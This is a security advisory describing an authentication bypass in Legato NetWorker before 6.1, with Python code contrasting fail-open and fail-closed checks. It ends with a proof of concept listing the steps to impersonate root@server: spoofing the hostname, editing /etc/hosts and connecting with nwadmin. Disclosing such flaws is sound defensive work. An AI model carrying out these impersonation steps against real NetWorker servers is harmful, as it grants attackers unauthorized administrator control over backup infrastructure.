Legato NetWorker is a solution for addressing the data storage needs of large and small heterogeneous enterprise environments. A security vulnerability in the product allows attackers to bypass the authentication procedure of the Legato NetWorker application.
Credit:
The information has been provided by 10function.
Vulnerable systems:
Legato NetWorker prior to version 6.1
There is a weakness in the authentication scheme of the Legato NetWorker software. When a client contacts the server, it announces (in clear text, via RPC) its hostname or IP address, its username and the user's groups. The server then tries to resolve the IP address of the machine that initiated the dialog; if this fails, it sends an "unknown host" answer but does not stop the authentication process. As a result, any machine whose IP address the server cannot resolve can impersonate any host or user, and in this way gain administrator privileges on the NetWorker admin interface.
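To make the fail-open behaviour concrete, the following added example (not Legato's code) models the server-side check described above: one version keeps going after the reverse lookup fails, the other fails closed and derives the client's identity only from the resolved address. The PTR table, `ClientHello` structure and `ADMINS` set are constructed for the example; the assumption that a successfully resolved name is compared with the claimed one is also ours.

```python
from dataclasses import dataclass
from typing import Optional

# Constructed reverse-DNS (PTR) table standing in for what the server can resolve.
PTR_TABLE = {
    "1.2.3.4": "server",    # the NetWorker server itself
    "10.0.0.5": "client1",  # a known backup client
}

# Constructed policy: which (host, user) pairs are NetWorker administrators.
ADMINS = {("server", "root")}


def reverse_lookup(ip: str) -> Optional[str]:
    """Simulated reverse lookup; None mirrors the server's 'unknown host' case."""
    return PTR_TABLE.get(ip)


@dataclass
class ClientHello:
    claimed_host: str  # hostname announced by the client over RPC (untrusted)
    claimed_user: str  # username announced by the client (untrusted)
    source_ip: str     # address the connection actually arrived from


def authorize_vulnerable(hello: ClientHello) -> bool:
    """Fail-open logic as described in the advisory: when the source IP does
    not resolve, 'unknown host' is reported but the client's self-reported
    hostname is still used for the admin decision."""
    resolved = reverse_lookup(hello.source_ip)
    if resolved is None:
        pass  # "unknown host" answer, yet authentication continues
    elif resolved != hello.claimed_host:
        return False  # assumed: a resolved name that disagrees is rejected
    return (hello.claimed_host, hello.claimed_user) in ADMINS


def authorize_hardened(hello: ClientHello) -> bool:
    """Fail closed: an unresolvable source address is rejected outright, and
    the identity used for the decision is the resolved name, never the claim."""
    resolved = reverse_lookup(hello.source_ip)
    if resolved is None or resolved != hello.claimed_host:
        return False
    return (resolved, hello.claimed_user) in ADMINS
```

The unresolvable-address case is the one that separates the two functions: a claim of "server"/"root" from an address absent from the PTR table is accepted by the fail-open version and rejected by the fail-closed one.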
Proof of concept:
Here we assume that "server" is the NetWorker server, whose IP address is 1.2.3.4.
We use a machine called "intruder", with IP address A.B.C.D, that can communicate freely with "server".
Prerequisite: "server" must be unable to reverse-resolve the address A.B.C.D of "intruder" to a hostname (the machine is unknown in /etc/hosts and in the associated DNS zone).
Therefore, as root on "intruder", we perform the following actions:
* Change the hostname of the machine so that it matches the server's:
# hostname server
* Also fake the resolution mechanism on the intruder machine:
add "A.B.C.D server" to /etc/hosts
* Contact the server with 'nwadmin -s 1.2.3.4'
* Now the server thinks you are root@server, so it will probably grant you admin privileges.
(You can also impersonate another user by creating that user on "intruder" and doing a 'su'.)